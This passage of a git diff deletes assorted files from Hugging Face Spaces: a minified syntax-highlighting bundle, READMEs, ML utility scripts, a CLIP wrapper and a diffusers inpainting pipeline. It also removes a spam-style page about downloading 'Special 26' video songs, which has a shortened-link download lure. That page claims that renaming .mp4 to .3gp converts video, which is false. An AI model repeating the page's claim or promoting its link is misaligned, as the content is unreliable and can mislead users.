]*(?:[\r\n]|\r\n)/)}),y=(e="")=>({className:"subst",label:"interpol",begin:m(/\\/,e,/\(/),end:/\)/}),N=(e="")=>({begin:m(e,/"""/),end:m(/"""/,e),contains:[E(e),$(e),y(e)]}),w=(e="")=>({begin:m(e,/"/),end:m(/"/,e),contains:[E(e),y(e)]}),v={className:"string",variants:[N(),N("#"),N("##"),N("###"),w(),w("#"),w("##"),w("###"),]},x={match:m(/`/,eS,/`/)},k=[x,{className:"variable",match:/\$\d+/},{className:"variable",match:`\\$${eO}+`},],M=[{match:/(@|#(un)?)available/,className:"keyword",starts:{contains:[{begin:/\(/,end:/\)/,keywords:eT,contains:[...b,f,v]},]}},{className:"keyword",match:m(/@/,p(...eC))},{className:"meta",match:m(/@/,eS)},],O={match:g(/\b[A-Z]/),relevance:0,contains:[{className:"type",match:m(/(AV|CA|CF|CG|CI|CL|CM|CN|CT|MK|MP|MTK|MTL|NS|SCN|SK|UI|WK|XC)/,eO,"+")},{className:"type",match:eA,relevance:0},{match:/[?!]+/,relevance:0},{match:/\.\.\./,relevance:0},{match:m(/\s+&\s+/,g(eA)),relevance:0},]};O.contains.push({begin://,keywords:o,contains:[...a,...c,...M,u,O]});let 
S={begin:/\(/,end:/\)/,relevance:0,keywords:o,contains:["self",{match:m(eS,/\s*:/),keywords:"_|0",relevance:0},...a,...c,...d,...b,f,v,...k,...M,O,]},A={begin:/</,end:/>/,contains:[...a,O]},C={begin:/\(/,end:/\)/,keywords:o,contains:[{begin:p(g(m(eS,/\s*:/)),g(m(eS,/\s+/,eS,/\s*:/))),end:/:/,relevance:0,contains:[{className:"keyword",match:/\b_\b/},{className:"params",match:eS},]},...a,...c,...b,f,v,...M,O,S,],endsParent:!0,illegal:/["']/},T={match:[/func/,/\s+/,p(x.match,eS,ek)],className:{1:"keyword",3:"title.function"},contains:[A,C,n],illegal:[/\[/,/%/]};for(let R of v.variants){let D=R.contains.find(e=>"interpol"===e.label);D.keywords=o;let I=[...c,...d,...b,f,v,...k];D.contains=[...I,{begin:/\(/,end:/\)/,contains:["self",...I]},]}return{name:"Swift",keywords:o,contains:[...a,T,{match:[/\b(?:subscript|init[?!]?)/,/\s*(?=[<(])/],className:{1:"keyword"},contains:[A,C,n],illegal:/\[|%/},{beginKeywords:"struct protocol class extension enum actor",end:"\\{",excludeEnd:!0,keywords:o,contains:[e.inherit(e.TITLE_MODE,{className:"title.class",begin:/[A-Za-z$_][\u00C0-\u02B80-9A-Za-z$_]*/}),...c,]},{match:[/operator/,/\s+/,ek],className:{1:"keyword",3:"title"}},{begin:[/precedencegroup/,/\s+/,eA],className:{1:"keyword",3:"title"},contains:[O],keywords:[...ey,...e$],end:/}/},{beginKeywords:"import",end:/$/,contains:[...a],relevance:0},...c,...d,...b,f,v,...k,...M,O,S,]}},grmr_typescript(e){let n=em(e),t=["any","void","number","boolean","string","object","never","symbol","bigint","unknown",],a={beginKeywords:"namespace",end:/\{/,excludeEnd:!0,contains:[n.exports.CLASS_REFERENCE]},i={beginKeywords:"interface",end:/\{/,excludeEnd:!0,keywords:{keyword:"interface 
extends",built_in:t},contains:[n.exports.CLASS_REFERENCE]},r={$pattern:es,keyword:el.concat(["type","namespace","interface","public","private","protected","implements","declare","abstract","readonly","enum","override",]),literal:eo,built_in:eb.concat(t),"variable.language":eu},s={className:"meta",begin:"@[A-Za-z$_][0-9A-Za-z$_]*"},l=(e,n,t)=>{let a=e.contains.findIndex(e=>e.label===n);if(-1===a)throw Error("can not find mode to replace");e.contains.splice(a,1,t)};return Object.assign(n.keywords,r),n.exports.PARAMS_CONTAINS.push(s),n.contains=n.contains.concat([s,a,i]),l(n,"shebang",e.SHEBANG()),l(n,"use_strict",{className:"meta",relevance:10,begin:/^\s*['"]use strict['"]/}),n.contains.find(e=>"func.def"===e.label).relevance=0,Object.assign(n,{name:"TypeScript",aliases:["ts","tsx"]}),n},grmr_vbnet(e){let n=e.regex,t=/\d{1,2}\/\d{1,2}\/\d{4}/,a=/\d{4}-\d{1,2}-\d{1,2}/,i=/(\d|1[012])(:\d+){0,2} *(AM|PM)/,r=/\d{1,2}(:\d{1,2}){1,2}/,s={className:"literal",variants:[{begin:n.concat(/# */,n.either(a,t),/ *#/)},{begin:n.concat(/# */,r,/ *#/)},{begin:n.concat(/# */,i,/ *#/)},{begin:n.concat(/# */,n.either(a,t),/ +/,n.either(i,r),/ *#/)},]},l=e.COMMENT(/'''/,/$/,{contains:[{className:"doctag",begin:/<\/?/,end:/>/}]}),o=e.COMMENT(null,/$/,{variants:[{begin:/'/},{begin:/([\t ]|^)REM(?=\s)/}]});return{name:"Visual Basic .NET",aliases:["vb"],case_insensitive:!0,classNameAliases:{label:"symbol"},keywords:{keyword:"addhandler alias aggregate ansi as async assembly auto binary by byref byval call case catch class compare const continue custom declare default delegate dim distinct do each equals else elseif end enum erase error event exit explicit finally for friend from function get global goto group handles if implements imports in inherits interface into iterator join key let lib loop me mid module mustinherit mustoverride mybase myclass namespace narrowing new next notinheritable notoverridable of off on operator option optional order overloads overridable overrides paramarray 
partial preserve private property protected public raiseevent readonly redim removehandler resume return select set shadows shared skip static step stop structure strict sub synclock take text then throw to try unicode until using when where while widening with withevents writeonly yield",built_in:"addressof and andalso await directcast gettype getxmlnamespace is isfalse isnot istrue like mod nameof new not or orelse trycast typeof xor cbool cbyte cchar cdate cdbl cdec cint clng cobj csbyte cshort csng cstr cuint culng cushort",type:"boolean byte char date decimal double integer long object sbyte short single string uinteger ulong ushort",literal:"true false nothing"},illegal:"//|\\{|\\}|endif|gosub|variant|wend|^\\$ ",contains:[{className:"string",begin:/"(""|[^/n])"C\b/},{className:"string",begin:/"/,end:/"/,illegal:/\n/,contains:[{begin:/""/}]},s,{className:"number",relevance:0,variants:[{begin:/\b\d[\d_]*((\.[\d_]+(E[+-]?[\d_]+)?)|(E[+-]?[\d_]+))[RFD@!#]?/},{begin:/\b\d[\d_]*((U?[SIL])|[%&])?/},{begin:/&H[\dA-F_]+((U?[SIL])|[%&])?/},{begin:/&O[0-7_]+((U?[SIL])|[%&])?/},{begin:/&B[01_]+((U?[SIL])|[%&])?/},]},{className:"label",begin:/^\w+:/},l,o,{className:"meta",begin:/[\t ]*#(const|disable|else|elseif|enable|end|externalsource|if|region)\b/,end:/$/,keywords:{keyword:"const disable else elseif enable end externalsource if region then"},contains:[o]},]}},grmr_wasm(e){e.regex;let n=e.COMMENT(/\(;/,/;\)/);return 
n.contains.push("self"),{name:"WebAssembly",keywords:{$pattern:/[\w.]+/,keyword:["anyfunc","block","br","br_if","br_table","call","call_indirect","data","drop","elem","else","end","export","func","global.get","global.set","local.get","local.set","local.tee","get_global","get_local","global","if","import","local","loop","memory","memory.grow","memory.size","module","mut","nop","offset","param","result","return","select","set_global","set_local","start","table","tee_local","then","type","unreachable",]},contains:[e.COMMENT(/;;/,/$/),n,{match:[/(?:offset|align)/,/\s*/,/=/],className:{1:"keyword",3:"operator"}},{className:"variable",begin:/\$[\w_]+/},{match:/(\((?!;)|\))+/,className:"punctuation",relevance:0},{begin:[/(?:func|call|call_indirect)/,/\s+/,/\$[^\s)]+/],className:{1:"keyword",3:"title.function"}},e.QUOTE_STRING_MODE,{match:/(i32|i64|f32|f64)(?!\.)/,className:"type"},{className:"keyword",match:/\b(f32|f64|i32|i64)(?:\.(?:abs|add|and|ceil|clz|const|convert_[su]\/i(?:32|64)|copysign|ctz|demote\/f64|div(?:_[su])?|eqz?|extend_[su]\/i32|floor|ge(?:_[su])?|gt(?:_[su])?|le(?:_[su])?|load(?:(?:8|16|32)_[su])?|lt(?:_[su])?|max|min|mul|nearest|neg?|or|popcnt|promote\/f32|reinterpret\/[fi](?:32|64)|rem_[su]|rot[lr]|shl|shr_[su]|store(?:8|16|32)?|sqrt|sub|trunc(?:_[su]\/f(?:32|64))?|wrap\/i64|xor))\b/},{className:"number",relevance:0,match:/[+-]?\b(?:\d(?:_?\d)*(?:\.\d(?:_?\d)*)?(?:[eE][+-]?\d(?:_?\d)*)?|0x[\da-fA-F](?:_?[\da-fA-F])*(?:\.[\da-fA-F](?:_?[\da-fA-D])*)?(?:[pP][+-]?\d(?:_?\d)*)?)\b|\binf\b|\bnan(?::0x[\da-fA-F](?:_?[\da-fA-D])*)?\b/},]}},grmr_yaml(e){let n="true false yes no 
null",t="[\\w#;/?:@&=+$,.~*'()[\\]]+",a={className:"string",relevance:0,variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/\S+/},],contains:[e.BACKSLASH_ESCAPE,{className:"template-variable",variants:[{begin:/\{\{/,end:/\}\}/},{begin:/%\{/,end:/\}/},]},]},i=e.inherit(a,{variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/[^\s,{}[\]]+/},]}),r={end:",",endsWithParent:!0,excludeEnd:!0,keywords:n,relevance:0},s=[{className:"attr",variants:[{begin:"\\w[\\w :\\/.-]*:(?=[ ]|$)"},{begin:'"\\w[\\w :\\/.-]*":(?=[ ]|$)'},{begin:"'\\w[\\w :\\/.-]*':(?=[ ]|$)"},]},{className:"meta",begin:"^---\\s*$",relevance:10},{className:"string",begin:"[\\|>]([1-9]?[+-])?[ ]*\\n( +)[^ ][^\\n]*\\n(\\2[^\\n]+\\n?)*"},{begin:"<%[%=-]?",end:"[%-]?%>",subLanguage:"ruby",excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:"!\\w+!"+t},{className:"type",begin:"!<"+t+">"},{className:"type",begin:"!"+t},{className:"type",begin:"!!"+t},{className:"meta",begin:"&"+e.UNDERSCORE_IDENT_RE+"$"},{className:"meta",begin:"\\*"+e.UNDERSCORE_IDENT_RE+"$"},{className:"bullet",begin:"-(?=[ ]|$)",relevance:0},e.HASH_COMMENT_MODE,{beginKeywords:n,keywords:{literal:n}},{className:"number",begin:"\\b[0-9]{4}(-[0-9][0-9]){0,2}([Tt \\t][0-9][0-9]?(:[0-9][0-9]){2})?(\\.[0-9]*)?([ \\t])*(Z|[-+][0-9][0-9]?(:[0-9][0-9])?)?\\b"},{className:"number",begin:e.C_NUMBER_RE+"\\b",relevance:0},{begin:/\{/,end:/\}/,contains:[r],illegal:"\\n",relevance:0},{begin:"\\[",end:"\\]",contains:[r],illegal:"\\n",relevance:0},a,],l=[...s];return l.pop(),l.push(i),r.contains=l,{name:"YAML",case_insensitive:!0,aliases:["yml"],contains:s}}});let eD=Q;for(let eI of Object.keys(eR)){let eL=eI.replace("grmr_","").replace("_","-");eD.registerLanguage(eL,eR[eI])}return eD}();"object"==typeof exports&&"undefined"!=typeof module&&(module.exports=hljs); \ No newline at end of file diff --git a/spaces/mrtimmydontplay/api/README.md b/spaces/mrtimmydontplay/api/README.md deleted file mode 100644 index 
f71fe4ef8129b9a1dc21b3a66f5c8defccfa7e6c..0000000000000000000000000000000000000000 --- a/spaces/mrtimmydontplay/api/README.md +++ /dev/null @@ -1,20 +0,0 @@ ---- -title: Shiny for Python template -emoji: 🌍 -colorFrom: yellow -colorTo: indigo -sdk: docker -pinned: false -license: other -duplicated_from: posit/shiny-for-python-template ---- - -This is a templated Space for [Shiny for Python](https://shiny.rstudio.com/py/). - -To get started with a new app do the following: - -1) Install Shiny with `pip install shiny` -2) Create a new app with `shiny create .` -3) Then run the app with `shiny run --reload` - -To learn more about this framework please see the [Documentation](https://shiny.rstudio.com/py/docs/overview.html). diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/hubert/simple_kmeans/feature_utils.py b/spaces/mshukor/UnIVAL/fairseq/examples/hubert/simple_kmeans/feature_utils.py deleted file mode 100644 index f80bc4569768fac181133cdc8f76d1230e03bff6..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/hubert/simple_kmeans/feature_utils.py +++ /dev/null @@ -1,66 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import logging -import os -import sys - -import tqdm -from npy_append_array import NpyAppendArray - - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("feature_utils") - - -def get_shard_range(tot, nshard, rank): - assert rank < nshard and rank >= 0, f"invaid rank/nshard {rank}/{nshard}" - start = round(tot / nshard * rank) - end = round(tot / nshard * (rank + 1)) - assert start < end, f"start={start}, end={end}" - logger.info( - f"rank {rank} of {nshard}, process {end-start} " - f"({start}-{end}) out of {tot}" - ) - return start, end - - -def get_path_iterator(tsv, nshard, rank): - with open(tsv, "r") as f: - root = f.readline().rstrip() - lines = [line.rstrip() for line in f] - start, end = get_shard_range(len(lines), nshard, rank) - lines = lines[start:end] - def iterate(): - for line in lines: - subpath, nsample = line.split("\t") - yield f"{root}/{subpath}", int(nsample) - return iterate, len(lines) - - -def dump_feature(reader, generator, num, split, nshard, rank, feat_dir): - iterator = generator() - - feat_path = f"{feat_dir}/{split}_{rank}_{nshard}.npy" - leng_path = f"{feat_dir}/{split}_{rank}_{nshard}.len" - - os.makedirs(feat_dir, exist_ok=True) - if os.path.exists(feat_path): - os.remove(feat_path) - - feat_f = NpyAppendArray(feat_path) - with open(leng_path, "w") as leng_f: - for path, nsample in tqdm.tqdm(iterator, total=num): - feat = reader.get_feats(path, nsample) - feat_f.append(feat.cpu().numpy()) - leng_f.write(f"{len(feat)}\n") - logger.info("finished successfully") - - diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/data/__init__.py b/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/data/__init__.py deleted file mode 100644 index d0545627efc9a6f9bb180e351ead519a2cb6dea7..0000000000000000000000000000000000000000 --- 
a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/data/__init__.py +++ /dev/null @@ -1,13 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from .extracted_features_dataset import ExtractedFeaturesDataset -from .random_input_dataset import RandomInputDataset - - -__all__ = [ - "ExtractedFeaturesDataset", - "RandomInputDataset", -] diff --git a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/encoders/__init__.py b/spaces/mshukor/UnIVAL/fairseq/fairseq/data/encoders/__init__.py deleted file mode 100644 index 7cbe00a10520331709441e5e77991bd2edca8c06..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/encoders/__init__.py +++ /dev/null @@ -1,29 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import importlib -import os - -from fairseq import registry - - -build_tokenizer, register_tokenizer, TOKENIZER_REGISTRY, _ = registry.setup_registry( - "--tokenizer", - default=None, -) - - -build_bpe, register_bpe, BPE_REGISTRY, _ = registry.setup_registry( - "--bpe", - default=None, -) - - -# automatically import any Python files in the encoders/ directory -for file in sorted(os.listdir(os.path.dirname(__file__))): - if file.endswith(".py") and not file.startswith("_"): - module = file[: file.find(".py")] - importlib.import_module("fairseq.data.encoders." 
+ module) diff --git a/spaces/mshukor/UnIVAL/run_scripts/image_gen/inception_score.py b/spaces/mshukor/UnIVAL/run_scripts/image_gen/inception_score.py deleted file mode 100644 index 3883593c38f5531dcf5626b8a6ac69027899d4ce..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/run_scripts/image_gen/inception_score.py +++ /dev/null @@ -1,107 +0,0 @@ -import os -from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.data -import torchvision.transforms as transforms -from torchvision.models.inception import inception_v3, Inception_V3_Weights -from scipy.stats import entropy -from torch.autograd import Variable -from eval_utils.dataset import Dataset -from eval_utils.inceptionV3 import InceptionV3 - -parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter) -parser.add_argument('--batch-size', type=int, default=64, - help='Batch size to use') -parser.add_argument('--dims', type=int, default=2048, - choices=list(InceptionV3.BLOCK_INDEX_BY_DIM), - help=('Dimensionality of Inception features to use. 
' - 'By default, uses pool3 features')) -parser.add_argument('-c', '--gpu', default='', type=str, - help='GPU to use (leave blank for CPU only)') -parser.add_argument('--path1', type=str, help='path to images') - - -def inception_score(imgs, cuda=True, batch_size=32, resize=False, splits=1): - """Computes the inception score of the generated images imgs - imgs -- Torch dataset of (3xHxW) numpy images normalized in the range [-1, 1] - cuda -- whether or not to run on GPU - batch_size -- batch size for feeding into Inception v3 - splits -- number of splits - """ - N = len(imgs) - - os.environ['TORCH_HOME']= '/lus/home/NAT/gda2204/mshukor/.cache/torch' - - assert batch_size > 0 - if batch_size > N: - batch_size = N - - # Set up dtype - if cuda: - dtype = torch.cuda.FloatTensor - else: - if torch.cuda.is_available(): - print("WARNING: You have a CUDA device, so you should probably set cuda=True") - dtype = torch.FloatTensor - - # Set up dataloader - dataloader = torch.utils.data.DataLoader(imgs, batch_size=batch_size) - - # Load inception model - print("Load inception model") - inception_model = inception_v3(transform_input=False).type(dtype) - checkpoint = torch.load("/lus/home/NAT/gda2204/mshukor/.cache/torch/hub/checkpoints/inception_v3_google-0cc3c7bd.pth") - - # print(checkpoint.keys()) - inception_model.load_state_dict(checkpoint) - inception_model.eval() - up = nn.Upsample(size=(299, 299), mode='bilinear').type(dtype) - - def get_pred(x): - if resize: - x = up(x) - x = inception_model(x) - return F.softmax(x).data.cpu().numpy() - - # Get predictions - preds = np.zeros((N, 1000)) - - for i, batch in enumerate(dataloader, 0): - batch = batch.type(dtype) - batchv = Variable(batch) - batch_size_i = batch.size()[0] - - preds[i * batch_size:i * batch_size + batch_size_i] = get_pred(batchv) - - # Now compute the mean kl-div - split_scores = [] - - for k in range(splits): - part = preds[k * (N // splits): (k + 1) * (N // splits), :] - py = np.mean(part, axis=0) - scores 
= [] - for i in range(part.shape[0]): - pyx = part[i, :] - scores.append(entropy(pyx, py)) - split_scores.append(np.exp(np.mean(scores))) - - return np.mean(split_scores), np.std(split_scores) - - -if __name__ == '__main__': - - - args = parser.parse_args() - os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu - - dataset = Dataset(args.path1, transforms.Compose([ - transforms.Resize((299, 299)), - transforms.ToTensor(), - ])) - mean, std = inception_score(dataset, cuda=True, batch_size=32, resize=False, splits=1) - print('IS mean: ', mean) - print('IS std: ', std) diff --git a/spaces/mumiao/BingAI/README.md b/spaces/mumiao/BingAI/README.md deleted file mode 100644 index d8cafb766bb1249421dbcabb2fec8dd5e91962cb..0000000000000000000000000000000000000000 --- a/spaces/mumiao/BingAI/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: BingAI -emoji: 🌖 -colorFrom: purple -colorTo: yellow -sdk: docker -pinned: false -license: mit -app_port: 8080 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ncoop57/clifs/clip.py b/spaces/ncoop57/clifs/clip.py deleted file mode 100644 index f362aa6a0a69e8b590f6190c9243c83322659e26..0000000000000000000000000000000000000000 --- a/spaces/ncoop57/clifs/clip.py +++ /dev/null @@ -1,80 +0,0 @@ -from torch import nn -import transformers -import torch -from PIL import Image - - -class CLIPModel(nn.Module): - def __init__(self, model_name: str = "openai/clip-vit-base-patch32", processor_name=None): - super(CLIPModel, self).__init__() - - if processor_name is None: - processor_name = model_name - - self.model = transformers.CLIPModel.from_pretrained(model_name) - self.processor = transformers.CLIPProcessor.from_pretrained(processor_name) - - def __repr__(self): - return "CLIPModel()" - - def forward(self, features): - image_embeds = [] - text_embeds = [] - - if 'pixel_values' in features: - vision_outputs = self.model.vision_model(pixel_values=features['pixel_values']) - 
image_embeds = self.model.visual_projection(vision_outputs[1]) - - if 'input_ids' in features: - text_outputs = self.model.text_model( - input_ids=features.get('input_ids'), - attention_mask=features.get('attention_mask', None), - position_ids=features.get('position_ids', None), - output_attentions=features.get('output_attentions', None), - output_hidden_states=features.get('output_hidden_states', None), - ) - text_embeds = self.model.text_projection(text_outputs[1]) - - sentence_embedding = [] - image_features = iter(image_embeds) - text_features = iter(text_embeds) - - for idx, input_type in enumerate(features['image_text_info']): - if input_type == 0: - sentence_embedding.append(next(image_features)) - else: - sentence_embedding.append(next(text_features)) - - features['sentence_embedding'] = torch.stack(sentence_embedding).float() - - return features - - def tokenize(self, texts): - images = [] - texts_values = [] - image_text_info = [] - - for idx, data in enumerate(texts): - if isinstance(data, Image.Image): # An Image - images.append(data) - image_text_info.append(0) - else: # A text - texts_values.append(data) - image_text_info.append(1) - - if len(texts_values) == 0: - texts_values = None - if len(images) == 0: - images = None - - inputs = self.processor(text=texts_values, images=images, return_tensors="pt", padding=True) - inputs['image_text_info'] = image_text_info - return inputs - - def save(self, output_path: str): - self.model.save_pretrained(output_path) - self.processor.save_pretrained(output_path) - - @staticmethod - def load(input_path: str): - return CLIPModel(model_name=input_path) diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Special 26 Movie 3gp Video Songs Download _HOT_.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Special 26 Movie 3gp Video Songs Download _HOT_.md deleted file mode 100644 index 1aae7dac107382ee80ad5242dd43b73530e99026..0000000000000000000000000000000000000000 --- 
a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Special 26 Movie 3gp Video Songs Download _HOT_.md +++ /dev/null @@ -1,19 +0,0 @@ -
    -

    How to Download Special 26 Movie 3GP Video Songs

    -

    Special 26 is a 2013 Bollywood thriller film starring Akshay Kumar, Kajal Aggarwal, Anupam Kher and Manoj Bajpayee. The film is based on the 1987 Opera House heist where a group of con-men posed as CBI officers and raided a jewellery store. The film has some catchy songs composed by M.M. Kreem and sung by various artists. If you want to download the video songs of Special 26 in 3GP format for your mobile phone, here are some steps you can follow:

    -
      -
    1. Go to this website that has the video songs of Special 26 in HD quality[^2^]. You can choose from four songs: Gore Mukhde Pe Zulfen, Mujh Mein Tu, Mujh Mein Tu ft. Akshay Kumar and Kaun Mera.
    2. -
    3. Click on the song you want to download and you will be redirected to another page where you can see the video player and some download options.
    4. -
    5. Right-click on the video player and select "Save video as" from the menu. You will see a pop-up window where you can choose the location and name of the file.
    6. -
    7. Before clicking on "Save", change the file extension from .mp4 to .3gp in the file name. For example, if the file name is "Gore Mukhde Pe Zulfen - Special 26.mp4", change it to "Gore Mukhde Pe Zulfen - Special 26.3gp". This will convert the video format from MP4 to 3GP.
    8. -
    9. Click on "Save" and wait for the download to complete. You can repeat the same steps for other songs you want to download.
    10. -
    -

    You can also watch the video songs of Special 26 on YouTube[^1^] or listen to them on Bollywood Hungama[^3^]. Enjoy!

    -

    Special 26 movie 3gp video songs download


    Download Zip >>> https://urlcod.com/2uIckx



    - -

    Special 26 is a critically acclaimed film that received positive reviews from both critics and audiences. The film was praised for its gripping plot, realistic portrayal of the 1980s era, and stellar performances by the cast. The film was also a commercial success, earning over ₹100 crore at the box office. The film was nominated for several awards, including Best Film, Best Director, Best Actor and Best Supporting Actor at the 59th Filmfare Awards.

    -

    The songs of Special 26 are also popular among the fans of the film. The songs are composed by M.M. Kreem, who is known for his melodious and soulful music. The lyrics are written by Irshad Kamil, who has penned some of the most memorable songs in Bollywood. The songs are sung by various singers, such as Keerthi Sagathia, M.M. Kreem, Shreya Ghoshal, Chaitra Ambadipudi and Papon. The songs range from romantic to patriotic to inspirational, and suit the mood and theme of the film.

    -

    If you are a fan of Special 26 and its songs, you can download them in 3GP format for your mobile phone by following the steps mentioned above. You can also watch them online or listen to them on music streaming platforms. You can also share them with your friends and family who love the film and its music. Special 26 is a film that will keep you entertained and engaged till the end.

    -

    e93f5a0c3f
    -
    -
    \ No newline at end of file diff --git a/spaces/nomic-ai/mosaicml_dolly_hhrlhf/index.html b/spaces/nomic-ai/mosaicml_dolly_hhrlhf/index.html deleted file mode 100644 index b09ce9d92fa9f8dd1d06a26563b242a4ad12b455..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/mosaicml_dolly_hhrlhf/index.html +++ /dev/null @@ -1,42 +0,0 @@ - - - - mosaicml/dolly_hhrlhf - - - - -
    - -
    - - - \ No newline at end of file diff --git a/spaces/nomic-ai/neulab_conala/README.md b/spaces/nomic-ai/neulab_conala/README.md deleted file mode 100644 index 2e4306dd81480a3dba23d9766d9039b4836a712f..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/neulab_conala/README.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -title: neulab/conala -emoji: 🗺️ -colorFrom: purple -colorTo: red -sdk: static -pinned: false ---- diff --git a/spaces/osanseviero/danfojs-test/README.md b/spaces/osanseviero/danfojs-test/README.md deleted file mode 100644 index b5cae726ec3a0b59ed0a284a5435d52598fccb79..0000000000000000000000000000000000000000 --- a/spaces/osanseviero/danfojs-test/README.md +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: Danfojs Test -emoji: 👁 -colorFrom: indigo -colorTo: green -sdk: static -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio`, `streamlit`, or `static` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code, or `static` html code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. 
diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/community/text_inpainting.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/community/text_inpainting.py deleted file mode 100644 index 99a488788a0de6db78ae7c2c89038565efd29551..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/community/text_inpainting.py +++ /dev/null @@ -1,302 +0,0 @@ -from typing import Callable, List, Optional, Union - -import PIL -import torch -from transformers import ( - CLIPImageProcessor, - CLIPSegForImageSegmentation, - CLIPSegProcessor, - CLIPTextModel, - CLIPTokenizer, -) - -from diffusers import DiffusionPipeline -from diffusers.configuration_utils import FrozenDict -from diffusers.models import AutoencoderKL, UNet2DConditionModel -from diffusers.pipelines.stable_diffusion import StableDiffusionInpaintPipeline -from diffusers.pipelines.stable_diffusion.safety_checker import StableDiffusionSafetyChecker -from diffusers.schedulers import DDIMScheduler, LMSDiscreteScheduler, PNDMScheduler -from diffusers.utils import deprecate, is_accelerate_available, logging - - -logger = logging.get_logger(__name__) # pylint: disable=invalid-name - - -class TextInpainting(DiffusionPipeline): - r""" - Pipeline for text based inpainting using Stable Diffusion. - Uses CLIPSeg to get a mask from the given text, then calls the Inpainting pipeline with the generated mask - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods the - library implements for all the pipelines (such as downloading or saving, running on a particular device, etc.) - - Args: - segmentation_model ([`CLIPSegForImageSegmentation`]): - CLIPSeg Model to generate mask from the given text. Please refer to the [model card]() for details. - segmentation_processor ([`CLIPSegProcessor`]): - CLIPSeg processor to get image, text features to translate prompt to English, if necessary. 
Please refer to the - [model card](https://huggingface.co/docs/transformers/model_doc/clipseg) for details. - vae ([`AutoencoderKL`]): - Variational Auto-Encoder (VAE) Model to encode and decode images to and from latent representations. - text_encoder ([`CLIPTextModel`]): - Frozen text-encoder. Stable Diffusion uses the text portion of - [CLIP](https://huggingface.co/docs/transformers/model_doc/clip#transformers.CLIPTextModel), specifically - the [clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14) variant. - tokenizer (`CLIPTokenizer`): - Tokenizer of class - [CLIPTokenizer](https://huggingface.co/docs/transformers/v4.21.0/en/model_doc/clip#transformers.CLIPTokenizer). - unet ([`UNet2DConditionModel`]): Conditional U-Net architecture to denoise the encoded image latents. - scheduler ([`SchedulerMixin`]): - A scheduler to be used in combination with `unet` to denoise the encoded image latens. Can be one of - [`DDIMScheduler`], [`LMSDiscreteScheduler`], or [`PNDMScheduler`]. - safety_checker ([`StableDiffusionSafetyChecker`]): - Classification module that estimates whether generated images could be considered offensive or harmful. - Please, refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for details. - feature_extractor ([`CLIPImageProcessor`]): - Model that extracts features from generated images to be used as inputs for the `safety_checker`. 
- """ - - def __init__( - self, - segmentation_model: CLIPSegForImageSegmentation, - segmentation_processor: CLIPSegProcessor, - vae: AutoencoderKL, - text_encoder: CLIPTextModel, - tokenizer: CLIPTokenizer, - unet: UNet2DConditionModel, - scheduler: Union[DDIMScheduler, PNDMScheduler, LMSDiscreteScheduler], - safety_checker: StableDiffusionSafetyChecker, - feature_extractor: CLIPImageProcessor, - ): - super().__init__() - - if hasattr(scheduler.config, "steps_offset") and scheduler.config.steps_offset != 1: - deprecation_message = ( - f"The configuration file of this scheduler: {scheduler} is outdated. `steps_offset`" - f" should be set to 1 instead of {scheduler.config.steps_offset}. Please make sure " - "to update the config accordingly as leaving `steps_offset` might led to incorrect results" - " in future versions. If you have downloaded this checkpoint from the Hugging Face Hub," - " it would be very nice if you could open a Pull request for the `scheduler/scheduler_config.json`" - " file" - ) - deprecate("steps_offset!=1", "1.0.0", deprecation_message, standard_warn=False) - new_config = dict(scheduler.config) - new_config["steps_offset"] = 1 - scheduler._internal_dict = FrozenDict(new_config) - - if hasattr(scheduler.config, "skip_prk_steps") and 